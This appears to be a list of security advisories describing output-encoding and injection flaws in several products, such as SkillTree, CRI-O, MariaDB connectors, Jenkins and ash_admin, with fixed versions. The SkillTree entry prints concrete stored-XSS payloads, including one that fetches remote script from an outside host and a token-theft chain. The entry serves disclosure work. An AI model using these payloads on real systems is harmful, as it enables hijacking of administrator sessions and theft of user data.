CVSS v3.1 |
| A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable. |
| Improper encoding or escaping of output in CSS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium) |
| Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Encoding or Escaping of Output vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks. |
| Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks. |
| SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch. |
| YesWiki is a wiki system written in PHP. Prior to version 4.6.6, Bazar form-field templates still apply |raw('html') to field.label / field.hint in attribute and label-body contexts, resulting stored XSS in form renders. This issue has been patched in version 4.6.6. |
| Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally. |
| Improper Encoding or Escaping of Output vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to inject arbitrary authentication parameters into the WWW-Authenticate challenge header.
BearerPlug and RequireScopePlug built the Bearer resource_metadata="..." challenge by interpolating a resource_metadata URL derived from the request tenant directly into the quoted value. In a multi-tenant application that sets the Ash tenant from request-controlled data (a subdomain, the Host, a path segment, or a header), a tenant containing a " closes the quoted value and appends attacker-chosen auth-params, including a second resource_metadata URL pointing at an attacker-controlled authorization server that spec-following clients follow. Carriage returns and line feeds are rejected by Plug, so this is parameter injection within one header, not response splitting.
This issue affects ash_authentication_oauth2_server: from 0.1.3 before 0.3.1. |
| fast-uri serializes the port component of a URI without validating it. When recomposing the authority, the userinfo and host components are escaped but the port is concatenated verbatim, so a port value that is not a sequence of digits can inject authority delimiters, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both fast-uri and Node's URL read the result back as the attacker's host with no error, so re-validating the built URI does not catch it. This affects applications that build URIs from parts and assign untrusted data to the port component through the serialize, normalize, or equal functions in their object forms. The issue affects fast-uri versions before 2.4.6, from 3.0.0 before 3.1.7, and from 4.0.0 before 4.1.4. It is fixed in 2.4.6, 3.1.7, and 4.1.4, where recomposeAuthority rejects any port that is not a digit sequence per RFC 3986. |
| Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos allows authenticated users to inject arbitrary iCalendar properties and events into their exported .ics feed by embedding raw CRLF sequences in subscription names or notes. Because the input validation layer only encodes HTML metacharacters but never strips newlines, and the export layer decodes those entities back before writing iCal output, an attacker with any valid account can craft a subscription whose name breaks out of the current VEVENT block and inserts fully attacker-controlled calendar events — including spoofed organizers, arbitrary email addresses in ATTENDEE properties, and misleading event content — into any calendar application subscribed to that feed. This issue has been patched in version 5.0.0. |
| xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createEntityReference(name) accepts an invalid name and the ENTITY_REFERENCE_NODE serializer emits the resulting nodeName directly in &name; form. Directly serializing the node or fragment with XMLSerializer.serializeToString() and requireWellFormed: true can therefore break the entity-reference boundary and produce attacker-controlled XML markup when reparsed. The parser does not ordinarily create these nodes, and element-child insertion is rejected, so exploitation requires an application to create and directly serialize an EntityReference. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom. |
| NVIDIA OpenShell for Linux contains a vulnerability in its inference proxy, where an attacker could cause an improper encoding or escaping of output. A successful exploit of this vulnerability might lead to information disclosure and data tampering. |
| Jenkins 2.579 and earlier, LTS 2.568.2 and earlier does not escape map keys when serializing objects as JSON and Python through its REST API, allowing attackers able to control map property names to inject arbitrary fields into JSON and Python API responses. |
| In Eclipse Ditto versions [1.3.0, 3.9.6], the ImplicitThingCreationMessageMapper of the connectivity service builds a CreateThing command by substituting placeholder values (e.g. {{ header:device_id }}) resolved from inbound message headers into a pre-configured JSON "thing" template as raw, un-escaped strings, and then parses the resulting string as JSON. Because the placeholder engine performs no JSON escaping and is unaware of the surrounding JSON string context, a resolved value containing a double-quote character can break out of its string and inject additional JSON structure.
When a connection is configured to use this mapper with a template that reflects a header whose value a publishing device can control (for example an MQTT 5 user property, an AMQP 1.0 application property, or a Kafka record header), an attacker able to publish on that connection can inject an inline _policy object. The inline policy overrides the administrator-configured policyId, letting the attacker assign an arbitrary access-control policy to the newly created digital twin — gaining full read/write access to it and potentially revoking the legitimate owner's access, with no administrator interaction.
Exploitation requires all of the following: the connection uses the (non-default) ImplicitThingCreation mapper; its template reflects an attacker-controllable header; and, for the policy-override impact, the connection's authorization subjects are permitted to create policies (the default). Deployments that restrict the connection's subjects to thing creation only via the entity-creation configuration are not affected by the policy-override impact. |
| openssl_encrypt versions before 1.4.9 fail to sanitize recovery-slot metadata in the desktop GUI, allowing attackers to inject control characters and line separators into the irreversible-removal confirmation dialog. Attackers can craft encrypted files with malicious slot identifiers containing bidi overrides or line-separator characters to forge warning text and deceive users during file removal operations. |
| The RegistrationMagic WordPress plugin before 6.0.9.9 does not escape a registration form field value before outputting it in an HTML attribute on an administrative page, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against high privilege users such as admin. |
| MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js permits SQL injection when attacker-controlled Buffer parameters are escaped client-side under the big5, gbk, sjis, cp932, or gb18030 client character sets. PacketOutputStream.writeBufferEscape in lib/io/packet-output-stream.js escaped bytes without the charset-aware getMbRecognizer logic in lib/misc/charset-mb.js. The server SQL lexer runs my_ismbchar before escape processing, so an attacker-controlled lead byte can consume the inserted 0x5C backslash as a multibyte trail byte and leave the following 0x27 quote unescaped, terminating the string literal and allowing arbitrary SQL. The default utf8mb4 character set and parameters sent through the execute binary prepared-statement path are not affected. Successful exploitation can expose or modify data available to the database account. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3. |
| PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, Request::getRequestUri() in lib/Request.php passes $_SERVER['REQUEST_URI'] through FILTER_SANITIZE_URL, which does not remove quotation marks, angle brackets, or apostrophes, and Controller::_init() stores the attacker-controlled value in Controller::$_urlBase. Controller::_jsonld() in lib/Controller.php then uses str_replace() to insert that value without JSON escaping into js/types.jsonld, js/paste.jsonld, and the other JSON-LD templates used by /?jsonld= and /?pasteid. A raw quotation mark delivered by an HTTP client, proxy, or structured-data crawler that does not normalize the request target can break out of the JSON string and inject arbitrary key-value data into a CORS-open application/ld+json response. The jsonld branch in Controller::__construct() returns before _setCacheHeaders(), so the response also lacks X-Content-Type-Options: nosniff, Content Security Policy, X-Frame-Options, and Referrer-Policy. Direct script execution was not demonstrated, but manipulated responses can affect structured-data consumers or combine with less strict clients. This issue is fixed in version 2.0.5. |
| MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb encodes and decodes all character data under the assumption that the connection character set is UTF-8. A server can announce a mid-session change to character_set_client through the OK-packet session-state-tracking mechanism, including through SET NAMES executed by a stored routine or trigger, server configuration, or a hostile or man-in-the-middle server. If the new character set is not UTF-8, the driver continues to exchange UTF-8 while the server interprets the same bytes under a different encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value raises R2dbcNonTransientResourceException with SQLState 08000 and closes the connection. This issue is fixed in version 1.4.1. |
| Improper Encoding or Escaping of Output vulnerability in ash-project ash_admin lets an attacker who controls a record's string primary key rewrite the target of AshAdmin's row-action links.
The Table, DataTable, and Show components built row-action URLs by raw string interpolation, splicing the primary key (and table, domain, and resource names) into the query string without URL-encoding. Ash resources routinely use user-settable string primary keys (slugs, emails). Because Plug.Conn.Query resolves duplicate parameters last-wins and primary_key is interpolated last, a stored key such as foo&action_type=destroy injects parameters that override the link, so an admin clicking edit is sent to a destroy form or an arbitrary resource; a # truncates the query into a fragment. The fix builds every link with URI.encode_query/1, encoding all interpolated values.
This issue affects ash_admin: from 0.3.0-rc.0 before 1.3.1. |
